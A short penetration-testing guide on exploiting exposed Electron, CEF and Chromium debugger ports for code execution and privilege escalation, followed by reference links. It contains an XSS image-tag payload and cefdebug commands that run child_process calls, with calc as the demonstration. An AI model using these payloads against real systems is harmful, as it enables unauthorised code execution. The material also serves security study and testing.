electron/CEF/chromium debugger abuse

If you find any process with electron, cef or chromium debugger running and listening to a port you should try to make the debugger execute arbitrary commands. Abusing this behaviour you could be able to escalate privileges.

The abuse of this vulnerability remotely could be as easy as injecting via XSS this line of JS:

<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')">

But obviously the exploitation will be much easier locally, as you can use a tool such as: https://github.com/taviso/cefdebug****

#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"

List of resources to pwn electorn apps: https://github.com/doyensec/awesome-electronjs-hacking

References

• https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s

• https://github.com/taviso/cefdebug

• https://iwantmore.pizza/posts/cve-2019-1414.html

• https://bugs.chromium.org/p/project-zero/issues/detail?id=773

• https://bugs.chromium.org/p/project-zero/issues/detail?id=1742

• https://bugs.chromium.org/p/project-zero/issues/detail?id=1944